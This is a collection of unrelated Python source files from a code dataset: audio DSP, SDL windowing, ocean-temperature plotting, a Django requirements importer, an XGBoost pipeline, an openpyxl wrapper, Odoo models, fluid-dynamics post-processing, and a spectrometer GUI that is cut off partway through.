buffer1[k] = gain * input_tuple[0] \n buffer2[k] = gain1 * input_tuple[1] \n\n # Compute output values\n output_value0 = clip16(gain * input_tuple[0] + g11 * buffer2[m2-1])\n output_value1 = clip16(gain1 * input_tuple[1] + g21 * buffer1[m1-1] )\n\n \n\n k = k + 1\n m1 = m1 + 1\n m2 = m2 + 1\n if k == buffer_length1:\n k = 0\n if m1 >= buffer_length1:\n m1 = 0\n if m2 >= buffer_length2:\n m2 = 0\n\n # Convert output value to binary string\n output_string = struct.pack('hh', output_value0, output_value1)\n\n # Write output value to audio stream\n stream.write(output_string)\n\n # Get next frame\n input_string = wf.readframes(1)\n\nprint(\"**** Done ****\")\n\nstream.stop_stream()\nstream.close()\np.terminate()\n\n\n\n\n\n\n","sub_path":"Lab3 /Lab_3_ASGMNT_3_4_kwc305.py","file_name":"Lab_3_ASGMNT_3_4_kwc305.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"449393274","text":"import ctypes\nimport sdl2\n\nfrom rendrer import Renderer\n\n\nclass Window:\n DEFAULT_WIDTH = 400\n DEFAULT_HEIGHT = 400\n\n def __init__(self, title, width=DEFAULT_WIDTH, height=DEFAULT_HEIGHT):\n sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO)\n self.sdl_window = sdl2.SDL_CreateWindow(\n title,\n sdl2.SDL_WINDOWPOS_CENTERED,\n sdl2.SDL_WINDOWPOS_CENTERED,\n width,\n height,\n sdl2.SDL_WINDOW_RESIZABLE\n )\n self._renderer = Renderer(self)\n self.resize()\n\n @property\n def size(self):\n width = ctypes.c_int()\n height = ctypes.c_int()\n sdl2.SDL_GetWindowSize(self.sdl_window, ctypes.byref(width), ctypes.byref(height))\n return width.value, height.value\n\n def resize(self):\n self._renderer.resize()\n\n def on_key_pressed(self, key_code):\n self._renderer.on_key_pressed(key_code)\n\n def on_key_up(self, key_code):\n self._renderer.on_key_up(key_code)\n\n def close(self):\n sdl2.SDL_DestroyWindow(self.sdl_window)\n sdl2.SDL_Quit()\n\n","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"94504268","text":"import xarray as xr\nimport xarray.ufuncs as xu\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nimport cartopy.crs as ccrs\nimport sys\nplt.rcParams.update({'font.size':18})\nvariable='thetao700'\n\nsurf_path='/DataArchive/C3S/subsurf_temp'\n\nds = xr.open_dataset(surf_path+'/Results/thetao_700m_ORCA-0.25x0.25_regular_1979_2018.nc')\nvar = ds[variable] - ds[variable].mean('time')\nweights = np.cos(ds.lat*np.pi/180)\n\nhov_nino = (var*weights).sel(lat=slice(-5,5), lon=slice(130,
 280)).mean(dim='lat')\nhov_nino = hov_nino.rename(r'$Temp~Anomalies~[^oC]$')\nfig=plt.figure(1, figsize=(8,10))\nax=fig.add_subplot(111)\np = hov_nino.plot.contourf(ax=ax, \n extend='both',\n cmap='RdBu_r', \n vmin=-1.5, vmax=1.5, levels=31,\n cbar_kwargs={'drawedges': True, 'shrink' : 0.80})\nfig.savefig(surf_path+'/Figures/'+variable+'_hovmoller_ORCA-0.25x0.25_regular_1979_2018.png', dpi=300, transparent=True)\nplt.show()\n\n","sub_path":"Hovmoller.py","file_name":"Hovmoller.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"577869150","text":"import pkg_resources\nfrom django import forms\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\n\nimport importer.tasks\n\n\nclass RequiresForm(forms.Form):\n requirements = forms.CharField(widget=forms.Textarea,\n help_text='Paste your requirements.txt')\n recursive = forms.BooleanField(required=False, initial=True,\n help_text=\"Recurse through requirements' requirements, etc.\")\n\n def clean_requirements(self):\n requirements = self.cleaned_data['requirements']\n for line in requirements.splitlines():\n if line.strip().startswith('['):\n raise forms.ValidationError(\"Sections aren't supported\")\n\n try:\n list(pkg_resources.parse_requirements(requirements))\n except ValueError as e:\n raise forms.ValidationError(u' '.join(e))\n\n return requirements\n\n\n@require_http_methods(['HEAD', 'GET', 'POST'])\ndef index(request):\n if request.method == 'POST':\n form = RequiresForm(request.POST)\n if form.is_valid():\n importer.tasks.ensure_requirements.delay(\n form.cleaned_data['requirements'],\n form.cleaned_data['recursive'])\n return HttpResponseRedirect('/')\n else:\n form = RequiresForm()\n\n return render(request, 'importer/index.html', {\n 'title': 'Import packages from PyPI',\n 'form': form,\n })\n","sub_path":"yolapi/importer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"309240861","text":"import pandas as pd\nfrom pipeline.my_pipe import MyPipeline\nfrom util_functions import *\n\nxgb_params = {\n \"max_depth\":6,\n \"learning_rate\":0.25,\n \"n_estimators\":10,\n \"objective\":'binary:logistic',\n \"booster\":'gbtree',\n \"n_jobs\":4,\n \"nthread\":None,\n \"gamma\":0,\n \"min_child_weight\":1,\n \"max_delta_step\":0,\n \"subsample\":1,\n \"colsample_bytree\":1,\n \"colsample_bylevel\":1,\n \"reg_alpha\":0,\n \"reg_lambda\":1,\n \"scale_pos_weight\":1,\n \"base_score\":0.5,\n \"random_state\":0,\n \"seed\":None,\n \"missing\":None,\n \"use_label_encoder\":False,\n \"eval_metric\":\"logloss\"\n } \n\n# Columns dropped at the start\ncolumns_filtered = [\n #\"Account_Created_Date\",\n #\"Last_Activity\",\n #\n \"ID\", # Useless\n \"Submitted_for_Approval\", # Empty\n \"Opportunity_Name\", # Useless\n \"Sales_Contract_No\", # Leakage\n \"Last_Activity\", # Empty\n \"Prod_Category_A\", # Empty\n \"Brand\", # Maybe-Useless\n \"Product_Type\", # Maybe-Useless\n \"Size\", # Maybe-Useless\n \"Product_Category_B\", # Maybe-Useless\n \"Price\", # Maybe-Useless\n \"Currency\", # Maybe-Useless\n \"Product_Family\", # High Cardinality, Low Importance\n \"Account_Name\", # High Cardinality, Might make noise\n \"Account_Owner\", # High Cardinality, Might make noise\n
\"Billing_Country\" # High Cardinality, Might make noise\n ]\n\n# Columnas Borradas al final\ncolumns_removed = [\n \"Opportunity_Created_Date\", # Leakage\n \"Planned_Delivery_Start_Date\", # Engineered\n \"Planned_Delivery_End_Date\", # Engineered\n \"Total_Taxable_Amount\", # Replaced\n \"Opportunity_ID\" # Irrelevant\n ]\n\ncolumns_to_label = [\n \"Quote_Type\",\n]\n\ncolumns_to_one_hot = [\n \"Region\",\n \"Bureaucratic_Code\",\n \"Account_Type\",\n \"Opportunity_Type\",\n \"Delivery_Terms\",\n ]\n\ndef preprocess(pipe, X):\n # Remove ignored columns\n pipe.apply_column_filter(columns_filtered)\n pipe.apply_pre_function(prefix_columns)\n pipe.apply_pre_function(fill_nones)\n\n # Change types to correct value\n preprocess_dates(pipe)\n\n # Apply data filling\n impute_all(pipe, X, set(columns_filtered))\n pipe.apply_labeling(columns_to_label)\n pipe.apply_one_hot(columns_to_one_hot)\n\n # Apply various functions\n pipe.apply_function(delete_old_registers)\n pipe.apply_function(insert_negotiation_length)\n pipe.apply_function(insert_client_age)\n pipe.apply_function(preprocess_amounts_blocks)\n pipe.apply_function(preprocess_delivery_dates)\n pipe.apply_function(sort_by_dates)\n pipe.apply_function(unify_coins)\n pipe.apply_function(groupby_opp_id)\n pipe.apply_function(drop_categoricals)\n\n # Remove non-numerical columns\n pipe.apply_remove_columns(columns_removed)\n\n\ndef main():\n X_train = pd.read_csv(\"../Datos/Train_TP2_Datos_2020-2C.csv\")\n X_test = pd.read_csv(\"../Datos/Test_TP2_Datos_2020-2C.csv\")\n\n X_train = X_train.loc[(X_train[\"Stage\"] == \"Closed Won\")|(X_train[\"Stage\"] == \"Closed Lost\"),:]\n X_train[\"Stage\"] = X_train['Stage'].apply(lambda x: 1 if x == 'Closed Won' else 0)\n\n pipe = MyPipeline(X_train, X_test)\n\n preprocess(pipe, X_train)\n set_xgb_model(pipe, xgb_params)\n pipe.set_time_folds(10)\n pipe.preprocess()\n pipe.train_xgb(verbose=True)\n #pipe.predict()\n pipe.score_xgb(verbose=True)\n pipe.output()\n #pipe.submit()\n print(\"TODO OK\")\n\nmain()\n","sub_path":"Tp 2/Modelos/boost_model_v19.py","file_name":"boost_model_v19.py","file_ext":"py","file_size_in_byte":3530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"583703422","text":"tab = ['zero ', 'jeden ', 'dwa ', 'trzy ', 'cztery ', 'pięć ', 'sześć ', 'siedem ', 'osiem ', 'dziewięć ']\nli = input('Liczba: ')\ndl = len(li)\nwynik = ''\npom = 0\n\nfor x in range(dl):\n pom = int(li[x])\n wynik += tab[pom]\n \nprint(f'{li} - {wynik}')\n \n \n\n\n","sub_path":"02-ControlStructures/02.33..py","file_name":"02.33..py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"304538129","text":"# -*- coding:utf-8 -*-\n\n__author__ = \"Lakisha\"\n\nimport os\nfrom openpyxl import Workbook, load_workbook\n\n#excel自定义封装\nclass LQOpenXL:\n def __init__(self, path, read_only=False):\n self.wb = None\n if os.path.exists(path):\n self.path = path\n self.wb = load_workbook(self.path, read_only=read_only)\n else:\n print(\"%s 文件不存在\"%path)\n exit(0)\n\n #获取excel的行数\n def get_cell_row(self, sheet):\n if self.wb:\n #先通过sheet获取工作簿\n sh = self.wb.get_sheet_by_name(sheet)\n if sh:\n return sh.max_row\n return None\n\n #获取excel的列数\n def get_cell_col(self, sheet):\n if self.wb:\n #先通过sheet获取工作簿\n sh = self.wb.get_sheet_by_name(sheet)\n if sh:\n return sh.max_column\n return None\n\n #获取工作簿名称列表\n def get_sheets_name(self):\n if self.wb:\n return self.wb.get_sheet_names()\n 
 return None\n\n # Get a sheet name by index\n def get_sheet_name_by_index(self, index):\n if self.wb:\n sheets = self.wb.get_sheet_names()\n sheet_len = len(sheets)\n\n if index >= 0 and index < sheet_len:\n return sheets[index]\n return None\n\n # Create a new sheet\n def creat_sheet(self, name, index=0):\n res = False\n if self.wb:\n self.wb.create_sheet(title=name, index=index)\n res = True\n return res\n\n # Rename a sheet\n def set_sheet_name(self, sheet_name, name):\n res = False\n if self.wb:\n self.wb[sheet_name].title = name\n res = True\n return res\n\n # Get a cell value\n def get_cell_value(self,sheet, row, column):\n value = None\n if self.wb:\n value = self.wb[sheet].cell(row=row, column=column).value\n return value\n\n # Set a cell value\n def set_cell_value(self, sheet, row, col, value):\n res = False\n if self.wb:\n self.wb[sheet].cell(row=row, column=col).value = value\n res = True\n return res\n\n def save(self, path=\"\"):\n if path !=\"\":\n self.path = path\n if self.wb:\n self.wb.save(self.path)\n\nif __name__ == \"__main__\":\n print(\"Basic python openpyxl example\")\n print(\"---\"*20, end=\"\\n\")\n\n xl = LQOpenXL(\"openpyxl_demo.xlsx\")\n\n # Get all sheet names\n sheets = xl.get_sheets_name()\n print(\"Sheet name list:\", sheets, end=\"\\n\")\n\n # Read all the data in every sheet\n for sheet in sheets:\n nrows = xl.get_cell_row(sheet)\n ncols = xl.get_cell_col(sheet)\n print(\"---\"*20, end=\"\\n\")\n for row in range(1, nrows+1):\n for col in range(1, ncols+1):\n value = xl.get_cell_value(sheet, row, col)\n print(\"[%d, %d]->%s\" % (row, col, value), end=\"\\t\")\n\n # Set the first row of every sheet to: DeepTest\n for sheet in sheets:\n ncols = xl.get_cell_col(sheet)\n for col in range(1, ncols+1):\n xl.set_cell_value(sheet,row=1,col=col, value=\"DeepTest\")\n\n xl.save()","sub_path":"第一期/无锡-慕兮/Task3/day_5/LQOpenxl.py","file_name":"LQOpenxl.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"562010808","text":"# -*- coding: utf-8 -*-\n###############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2015 - Today => Morales Rosas\n#\n###############################################################################\n#\n# Coded by: Lázaro Rodríguez Triana\n# Skype : lazarus.d\n# E-mail: lazaro@outlook.com\n###############################################################################\n\n\nfrom openerp import models, fields, api, _\nfrom datetime import date, datetime\nimport time\n\n\nclass ClienteTipo(models.Model):\n\n _name = 'cliente.tipo'\n\n name = fields.Char(string='Tipo')\n\n\nclass PaqueteContratado(models.Model):\n\n _name = 'paquete.contratado'\n\n name = fields.Char(string='Paquete')\n\n\nclass AniosRegalo(models.Model):\n\n _name = 'anios.regalo'\n\n name = fields.Char(string='Años')\n\n\nclass ResPartner(models.Model):\n\n _inherit = 'res.partner'\n\n cliente_tipo = fields.Many2one(\n comodel_name='cliente.tipo',\n string='Tipo')\n multi_pago = fields.Selection([\n ('no', 'No'),\n ('si', 'Si'),\n ], string='Multipago')\n paquete = fields.Many2one(\n comodel_name='paquete.contratado',\n string='Paquete contratado')\n anio_regalo = fields.Many2one(\n comodel_name='anios.regalo',\n string='Años regalo')\n\n asegurado_ids = fields.One2many(\n comodel_name='res.partner.asegurado',\n inverse_name='partner_id',\n string='Asegurados')\n\n\nclass ResPartnerAsegurado(models.Model):\n\n _name = 'res.partner.asegurado'\n\n fecha_ingreso = fields.Date(string='Fecha Ingreso')\n name = fields.Char(string='Nombre del
 asegurado')\n odontograma = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Odontograma')\n historia_clinica = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Historia Clínica')\n contrato = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Contrato')\n consentimiento = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Consentimiento')\n aviso = fields.Selection([\n ('completo', 'Completo'),\n ('incompleto', 'Incompleto'),\n ('falta', 'Falta información'),\n ], string='Aviso')\n comentarios = fields.Text(string='Comentarios')\n fecha_kit = fields.Date(string='Fecha de entrega Kit')\n responsable_kit = fields.Char(string='Responsable del Kit')\n numero_certificado = fields.Char(string='Número de certificado')\n status_asegurado = fields.Selection([\n ('criopreservado', 'Criopreservado'),\n ('baja', 'Baja'),\n ], string='Status asegurado')\n code = fields.Char(string='Código')\n partner_id = fields.Many2one(\n comodel_name='res.partner',\n string='Partner')\n","sub_path":"moralesrosas_store_cell_partner/models/partner.py","file_name":"partner.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"119532542","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pyvista as pv\nimport os\nimport sys\n\n# Set figure font globally to serif\nplt.rcParams[\"font.family\"] = \"serif\"\n\n# Change default figure DPI; remove for lower DPI displays (default = 100dpi)\nplt.rcParams[\"figure.dpi\"] = 250 \n\ndef main():\n # time start, end etc.\n start = 670\n end = 677.5\n dt = 0.5\n times = np.arange(start,end+dt,dt)\n \n # fluid & domain properties\n deltaB = 0.0654\n kappa = 3.041e-06\n H = 1.0\n \n for time in times:\n print(\"Time = %.12g\" % (time))\n print(\"Loading fields\")\n ## grid is the central object in VTK where every field is added on to grid\n grid = pv.UnstructuredGrid(\"./VTK/Ra_1e+10_H1_gradedMeshDNS_init_Y800_X1600_t670_%.12g.vtk\" % (time)) \n \n # get cell points\n points = grid.points\n xPts = np.unique(points[:,0])\n yPts = np.unique(points[:,1])\n zPts = np.unique(points[:,2])\n\n # get cell centres\n centres = grid.cell_centers().points\n xCts = np.unique(centres[:,0])\n yCts = np.unique(centres[:,1])\n zCts = np.unique(centres[:,2])\n \n # load buoyancy (permuted to change indexing: Y, Z, X -> X, Y, Z)\n b = np.transpose(grid.cell_arrays['b'].reshape((len(yCts),len(zCts),len(xCts))),(2,0,1))\n bf = np.transpose(grid.point_arrays['b'].reshape((len(yPts),len(zPts),len(xPts))),(2,0,1))\n u = np.transpose(grid.cell_arrays['u'].reshape((len(yCts),len(zCts),len(xCts),3)),(2,0,1,3))\n gradB = np.transpose(grid.cell_arrays['grad(b)'].reshape((len(yCts),len(zCts),len(xCts),3)),(2,0,1,3))\n \n ## calculate heat flux & add to VTK grid\n heatFlux = grid.cell_arrays['u']*grid.cell_arrays['b'][:,np.newaxis] - kappa*grid.cell_arrays['grad(b)']\n grid._add_cell_array(heatFlux, 'heatFlux')\n # normalise & convert to numpy for plotting\n heatFlux = np.transpose(heatFlux.reshape((len(yCts),len(zCts),len(xCts),3)),(2,0,1,3)) / (
 kappa*deltaB / H )\n \n # plot\n print(\"Plotting buoyancy\")\n plt.figure(figsize=(10,5))\n plt.pcolormesh(xCts,zCts,(b[:,0,:].transpose() / deltaB),cmap=\"magma\")\n plt.colorbar(label=r\"$b\\ /\\ \\Delta B$\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"buoyancy_cellCentre_t%.12g.png\" % (np.where(times == time)[0][0]))\n plt.close()\n \n plt.figure(figsize=(10,5))\n plt.pcolormesh(xPts,zPts,(bf[:,0,:].transpose() / deltaB),cmap=\"magma\")\n plt.colorbar(label=r\"$b\\ /\\ \\Delta B$\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"buoyancy_cellFace_t%.12g.png\" % (np.where(times == time)[0][0]))\n plt.close()\n \n print(\"Plotting vertical velocity\")\n plt.figure(figsize=(10,5))\n plt.pcolormesh(xCts,zCts,(u[:,0,:,2].transpose() / np.sqrt(deltaB*H)),cmap=\"RdBu_r\")\n plt.colorbar(label=r\"$w\\ /\\ \\sqrt{\\Delta B\\ H}$\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"w_cellCentre_t%.12g.png\" % (np.where(times == time)[0][0]))\n plt.close()\n \n print(\"Plotting heat flux\")\n plt.figure(figsize=(10,5))\n plt.pcolormesh(xCts,zCts,(heatFlux[:,0,:,2].transpose()),cmap=\"magma\")\n plt.colorbar(label=r\"Nu\")\n plt.xlabel(r\"$x\\ /\\ H$\")\n plt.ylabel(r\"$z\\ /\\ H$\")\n plt.savefig(\"heatFlux_cellCentre_t%.12g.png\" % (np.where(times == time)[0][0]))\n plt.close()\n \n plt.figure(figsize=(10,5))\n plt.plot(np.mean(heatFlux[:,0,:,2], axis=0), zCts)\n plt.ylabel(r\"$z\\ /\\ H$\")\n Nu = np.average(np.mean(heatFlux[:,0,:,2], axis=0), weights=np.diff(zPts))\n print(\"Nu = %f\" % (Nu))\n plt.title(\"Nu = %f\" % (Nu))\n plt.savefig(\"heatFlux_cellCentre_zProfile_t%.12g.png\" % (np.where(times == time)[0][0]))\n plt.close()\n \n print(\"End\")\n\n return 0\n\nmain()\n\n","sub_path":"partitioned/RayleighBenard/singleColumn/Ra_1e+10_multiFluidBoussinesqFoam_symmetricBCs_nonUniformSigma_sigmaConst_0_5_divTransfer_gamma_2_e-4_noDrag_buoyancyAnomaly_meanFactor_0_spinUp_energyDimPressureTerm_CN_0_55_largeDeltaT/get2Dfields.py","file_name":"get2Dfields.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"562572125","text":"'''\n\nThis program is designed to control two Ocean Optics Spectrometers simultaneously, with \nseparate control over coadding and integration time.
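Spectra from the two devices are read in parallel worker threads, plotted live, and saved to a dated results folder.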
\n\nCreated: August 2017\n\nLast update: August 2017\n\nContact: Ben Esse, Postgraduate Research Student, University of Manchester\nEmail: benjamin.esse@manchester.ac.uk\n\n'''\n\n# Import required libraries\nfrom tkinter import ttk\nimport tkinter as tk\nimport os\nimport seabreeze.spectrometers as sb\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport numpy as np\nimport datetime\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nfrom threading import Thread\nfrom queue import Queue\n\nfrom updash_lib.read_spectro_thread import read_spectro\nfrom updash_lib.file_control import make_directory\n\n# Define some fonts to use in the program\nNORM_FONT = ('Verdana', 10)\nLARG_FONT = ('Verdana', 12, 'bold')\n\nclass mygui(tk.Tk):\n \n def __init__(self, *args, **kwargs):\n \n # Create GUI in the backend\n tk.Tk.__init__(self, *args, **kwargs)\n \n # Add a title and an icon\n tk.Tk.wm_title(self, 'Dual Spectrometer Gui')\n tk.Tk.iconbitmap(self, default = 'logo.ico')\n \n # Create the container to hold the gui\n container = tk.Frame(self)\n container.grid()\n container.grid_rowconfigure(0, weight = 1)\n container.grid_columnconfigure(0, weight = 1)\n\n#========================================================================================\n#================================Set initial fit parameters==============================\n#========================================================================================\n\n # Set running to false. This parameter controls whether the program is acquiring\n # spectra or not\n self.running = False\n \n # Find spectrometerss connected to the computer\n self.devices = sb.list_devices()\n\n # If no devices are connected then set string to show. Else assign first to spec\n if len(self.devices) == 0:\n self.spec = 0\n self.spec_name0 = 'No devices connected'\n self.spec_name1 = 'No devices connected'\n self.devices = ['No devices connected']\n else:\n self.spec0 = sb.Spectrometer(self.devices[0])\n self.spec_name0 = str(self.spec0.serial_number)\n self.spec1 = sb.Spectrometer(self.devices[1])\n self.spec_name1 = str(self.spec1.serial_number)\n \n#========================================================================================\n#================================Define acquisition params===============================\n#========================================================================================\n \n#====================================First Spectrometer==================================\n \n # Create label to display the spectrometer name\n self.label_dev0 = ttk.Label(self, text=\"Device: \" + str(self.spec_name0), \n font = NORM_FONT)\n self.label_dev0.grid(row=0, column=0, pady=5, padx=5, columnspan=2)\n \n # Create label and entry to control the integration time\n self.integration_time0 = tk.StringVar(value = 100)\n self.label_intime0 = ttk.Label(self, text = 'Integration time (ms):', \n font = NORM_FONT)\n self.label_intime0.grid(row=9, column=0, pady=5, padx=10, sticky='E')\n self.ent_intime0 = ttk.Entry(self, textvariable = self.integration_time0)\n self.ent_intime0.grid(row=9, column=1, pady=5, padx=10, sticky='W')\n \n # Create label and entry to control the number of coadds\n self.coadds0 = tk.StringVar(value = 10)\n self.label_coadds0 = ttk.Label(self,text = 'Number of coadds:', font = NORM_FONT)\n self.label_coadds0.grid(row=10, column=0, pady=5, padx=10, sticky='E')\n self.ent_coadds0 = ttk.Entry(self, textvariable = self.coadds0)\n self.ent_coadds0.grid(row=10, column=1, pady=5, 
padx=10, sticky='W')\n \n # Create label, entry to control the number of dark spectra to take\n self.dark_no0 = tk.IntVar(value = 10)\n self.label_dark0 = ttk.Label(self, text = 'Number of dark spectra:',\n font = NORM_FONT)\n self.label_dark0.grid(row=11, column=0, pady=5, padx=10, sticky='E')\n self.ent_dark0 = ttk.Entry(self, textvariable = self.dark_no0)\n self.ent_dark0.grid(row=11, column=1, pady=5, padx=10, sticky='W') \n\n#====================================Second Spectrometer=================================\n \n # Create label to display the spectrometer name\n self.label_dev1 = ttk.Label(self, text=\"Device: \" + str(self.spec_name1), \n font = NORM_FONT)\n self.label_dev1.grid(row=0, column=2, pady=5, padx=5, columnspan=2)\n\n # Create label and entry to control the integration time\n self.integration_time1 = tk.StringVar(value = 100)\n self.label_intime1 = ttk.Label(self, text = 'Integration time (ms):',\n font = NORM_FONT)\n self.label_intime1.grid(row=9, column=2, pady=5, padx=10, sticky='E')\n self.ent_intime1 = ttk.Entry(self, textvariable = self.integration_time1)\n self.ent_intime1.grid(row=9, column=3, pady=5, padx=10, sticky='W')\n \n # Create label and entry to control the number of coadds\n self.coadds1 = tk.StringVar(value = 10)\n self.label_coadds1 = ttk.Label(self,text = 'Number of coadds:', font = NORM_FONT)\n self.label_coadds1.grid(row=10, column=2, pady=5, padx=10, sticky='E')\n self.ent_coadds1 = ttk.Entry(self, textvariable = self.coadds1)\n self.ent_coadds1.grid(row=10, column=3, pady=5, padx=10, sticky='W')\n \n # Create label, entry to control the number of dark spectra to take\n self.dark_no1 = tk.IntVar(value = 10)\n self.label_dark1 = ttk.Label(self, text = 'Number of dark spectra:', \n font = NORM_FONT)\n self.label_dark1.grid(row=11, column=2, pady=5, padx=10, sticky='E')\n self.ent_dark1 = ttk.Entry(self, textvariable = self.dark_no1)\n self.ent_dark1.grid(row=11, column=3, pady=5, padx=10, sticky='W')\n \n \n \n # Create label and entry to control the filepath to save the spectra to\n fpath_str = 'Results/' + str(datetime.date.today()) + '/spectro_gui_out/'\n self.file_path = tk.StringVar(value = fpath_str)\n self.label_fp = ttk.Label(self, text = 'File path:', font = NORM_FONT)\n self.label_fp.grid(row=6, column=5, pady=5, padx=10, sticky='E')\n self.ent_fp = ttk.Entry(self, textvariable = self.file_path)\n self.ent_fp.grid(row=6, column=6, pady=5, padx=10, sticky='W')\n \n#========================================================================================\n#===============================Create buttons to control app============================\n#========================================================================================\n\n # Create button to start and stop acquisition\n self.start_button = tk.Button(self, text = 'START',\n command = self.start_stop, width = 14, height = 3, \n font = LARG_FONT, bg = 'green')\n self.start_button.grid(row=1, column=5, pady=5, padx=5, columnspan = 2)\n\n # Create button to read once from the spectrometer\n self.acquire_button = tk.Button(self,text=\"Read single\",command=self.read_single,\n width = 14, height = 3, font = LARG_FONT)\n self.acquire_button.grid(row=2, column=5, pady=5, padx=5, columnspan = 2)\n \n # Create button to read the dark spectra\n self.dark_button = tk.Button(self, text=\"Read dark\", command=self.read_dk,\n width = 14, height = 3, font = LARG_FONT)\n self.dark_button.grid(row=3, column=5, pady=5, padx=5, columnspan = 2)\n \n # Create button to update the filepath to save 
spectra to\n self.button_fp = tk.Button(self, text = 'Update filepath',\n command = self.folder_update, width = 14, height = 3,\n font = LARG_FONT)\n self.button_fp.grid(row=4, column=5, pady=5, padx=5, columnspan = 2)\n \n # Create button to close the window\n self.close_button = tk.Button(self, text=\"Close\", command=self.quit, width = 14, \n height = 3, font = LARG_FONT)\n self.close_button.grid(row=5, column=5, pady=5, padx=5, columnspan = 2)\n\n#========================================================================================\n#============================Create text box to print updates============================\n#========================================================================================\n \n # Create a scroll bar\n scrollbar = ttk.Scrollbar(self)\n scrollbar.grid(row=7, column=8, rowspan = 6, sticky='NSE')\n\n # Create a text box to log messages for the user\n self.textbox = tk.Text(self, width = 40, height = 10, font = NORM_FONT,\n yscrollcommand = scrollbar.set)\n self.textbox.grid(row = 7, column = 5, columnspan = 2, rowspan = 6)\n \n # Connect the scrollbar to the textbox\n scrollbar.config(command = self.textbox.yview)\n \n#========================================================================================\n#====================================Create plot canvas==================================\n#======================================================================================== \n \n # Create figure to hold the graphs\n plt.rcParams.update({'font.size': 10} )\n self.fig = plt.figure(figsize = (10,5))\n gs = gridspec.GridSpec(1,2)\n \n # Create plot axes\n self.ax0 = self.fig.add_subplot(gs[0])\n self.ax1 = self.fig.add_subplot(gs[1])\n \n # Set axis labels\n self.ax0.set_ylabel('Intensity (arb)')\n self.ax0.set_xlabel('Wavelength (nm)')\n \n self.ax1.set_xlabel('Wavelength (nm)')\n \n # Create lines to plot data series\n \n # Spectral data\n self.line0, = self.ax0.plot(0, 0, 'b')\n self.line1, = self.ax1.plot(0, 0, 'b')\n \n # Pack into arrays to pass to plotting function\n self.lines = [self.line0, self.line1]\n self.axes = [self.ax0, self.ax1 ]\n \n # Make it look nice\n plt.tight_layout()\n \n # Create the canvas to hold the graph in the GUI\n self.canvas = FigureCanvasTkAgg(self.fig, self)\n self.canvas.show()\n self.canvas.get_tk_widget().grid(row=1,column=0,padx=10,\n columnspan = 4, rowspan = 7)\n \n '''\n # Add matplotlib toolbar above the plot canvas\n toolbar_frame = tk.Frame(self, bg = 'black') \n toolbar_frame.grid(row=0,column=3, sticky = 'W') \n toolbar = NavigationToolbar2TkAgg(self.canvas, toolbar_frame)\n toolbar.update()\n '''\n \n#========================================================================================\n#==================================Make output directory=================================\n#========================================================================================\n \n # Create directory to hold program outputs\n self.results_folder = self.ent_fp.get()\n \n # Create the directory, changing the name to avoid overwritting data\n self.results_folder = make_directory(self.results_folder)\n \n # Update the filepath in the GUI\n self.ent_fp.delete(0, len(self.ent_fp.get()))\n self.ent_fp.insert(0,str(self.results_folder))\n \n # Create notes text file to log changes in bg/dark or other things\n notes_fname = self.ent_fp.get() + 'notes.txt'\n \n # Create notes file\n with open(notes_fname, 'w') as w:\n w.write('Notes file for dual_spectro_run.py output\\n\\n') \n 
\n#========================================================================================\n#==================================Start acquire looping=================================\n#======================================================================================== \n \n # Define arrays to hold so2 amounts and spectra number for plotting \n self.so2_amts = np.array(())\n self.loops = np.array(())\n\n # Create loop counter\n self.loop = 0\n \n # Call acquire after a second, it will loop in the background\n self.acquire()\n \n#======================================================================================== \n#========================================================================================\n#======================================Define functions==================================\n#========================================================================================\n#======================================================================================== \n\n\n\n#========================================================================================\n#========================================update text=====================================\n#========================================================================================\n\n # Define function to output text to the textbox and the notes file\n def write_text(self,text):\n \n # Add new line return to text\n text = text + '\\n\\n'\n \n # Write text with a new line\n self.textbox.insert(tk.END, text)\n \n # Scroll if needed\n self.textbox.see(tk.END)\n \n # Update notes file\n with open(self.ent_fp.get() + 'notes.txt', 'a') as a:\n a.write(text)\n \n#========================================================================================\n#=======================================folder_update====================================\n#========================================================================================\n\n # Define function to update the filepath input by the user\n def folder_update(self):\n \n # Create directory to hold data 